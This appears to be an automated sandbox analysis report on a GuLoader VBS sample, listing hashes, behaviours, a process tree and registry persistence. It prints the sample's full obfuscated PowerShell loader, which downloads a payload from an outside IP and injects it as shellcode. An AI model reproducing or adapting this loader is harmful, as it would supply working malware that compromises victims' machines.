Analysis
-
max time kernel
146s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
13/02/2024, 03:03
Static task
static1
Behavioral task
behavioral1
Sample
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs
Resource
win10v2004-20231215-en
General
-
Target
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs
-
Size
36KB
-
MD5
de8bb4e7b3b42adcc01eaf37409ba15a
-
SHA1
77e869d2cdb86aea090f14a444e0d1ee39e5cd68
-
SHA256
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001
-
SHA512
5258eaf86e2da5799b8d4c73c5b7047502d7e66000bef6b6680aafc931c7590eb005917c9af4c8a788ee16638870354c3f044434d381b934f5ada38c09a48569
-
SSDEEP
768:vUJZmkTEmGkXZwCwzWfMKjWcHISdD0i6z2l+KaRB0e:cJLEXM9wzPKjXHISJ0i6z2w/f
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run SyncHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\YVC8YXKP = "C:\\Program Files (x86)\\windows mail\\wab.exe" SyncHost.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2564 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2768 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2564 powershell.exe 2768 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2564 set thread context of 2768 2564 powershell.exe 36 PID 2768 set thread context of 1356 2768 wab.exe 7 PID 2768 set thread context of 776 2768 wab.exe 41 PID 776 set thread context of 1356 776 SyncHost.exe 7 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2352 powershell.exe 2564 powershell.exe 2768 wab.exe 2768 wab.exe 2768 wab.exe 2768 wab.exe 2768 wab.exe 2768 wab.exe 2768 wab.exe 2768 wab.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe 776 SyncHost.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 2564 powershell.exe 2768 wab.exe 1356 Explorer.EXE 1356 Explorer.EXE 776 SyncHost.exe 776 SyncHost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 1392 wrote to memory of 2352 1392 WScript.exe 28 PID 1392 wrote to memory of 2352 1392 WScript.exe 28 PID 1392 wrote to memory of 2352 1392 WScript.exe 28 PID 2352 wrote to memory of 2076 2352 powershell.exe 31 PID 2352 wrote to memory of 2076 2352 powershell.exe 31 PID 2352 wrote to memory of 2076 2352 powershell.exe 31 PID 2076 wrote to memory of 2528 2076 cmd.exe 30 PID 2076 wrote to memory of 2528 2076 cmd.exe 30 PID 2076 wrote to memory of 2528 2076 cmd.exe 30 PID 2352 wrote to memory of 2564 2352 powershell.exe 33 PID 2352 wrote to memory of 2564 2352 powershell.exe 33 PID 2352 wrote to memory of 2564 2352 powershell.exe 33 PID 2352 wrote to memory of 2564 2352 powershell.exe 33 PID 2564 wrote to memory of 2556 2564 powershell.exe 34 PID 2564 wrote to memory of 2556 2564 powershell.exe 34 PID 2564 wrote to memory of 2556 2564 powershell.exe 34 PID 2564 wrote to memory of 2556 2564 powershell.exe 34 PID 2556 wrote to memory of 2592 2556 cmd.exe 35 PID 2556 wrote to memory of 2592 2556 cmd.exe 35 PID 2556 wrote to memory of 2592 2556 cmd.exe 35 PID 2556 wrote to memory of 2592 2556 cmd.exe 35 PID 2564 wrote to memory of 2768 2564 powershell.exe 36 PID 2564 wrote to memory of 2768 2564 powershell.exe 36 PID 2564 wrote to memory of 2768 2564 powershell.exe 36 PID 2564 wrote to memory of 2768 2564 powershell.exe 36 PID 2564 wrote to memory of 2768 2564 powershell.exe 36 PID 2564 wrote to memory of 2768 2564 powershell.exe 36 PID 1356 wrote to memory of 776 1356 Explorer.EXE 41 PID 1356 wrote to memory of 776 1356 Explorer.EXE 41 PID 1356 wrote to memory of 776 1356 Explorer.EXE 41 PID 1356 wrote to memory of 776 1356 Explorer.EXE 41
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"3⤵
- Suspicious use of WriteProcessMemory
PID:2076
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"3⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"4⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\tzutil.exetzutil /l5⤵PID:2592
-
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2768
-
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\SyncHost.exe"C:\Windows\SysWOW64\SyncHost.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:776
-
-
C:\Windows\system32\tzutil.exetzutil /l1⤵PID:2528
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\62ZU3B4JRGQ174Y887DD.temp
Filesize7KB
MD501b9f6bc4abd361bd0092bb6f3688abd
SHA19000d8c0a2efcf146e15f1657ba69b4c70b675e8
SHA256a2df4589b084ca80963bb7c7081041f40c5e5dc98aec10a695fc8d5ce803d329
SHA5120d7564173b62c0e508d4b92d80316cb60da48abd795047bc8bae579abbfe0d60912d3d00d29c0d9c1a9df28f11f12ff90ab3b15ec738d436c8e36dd28aaa7d87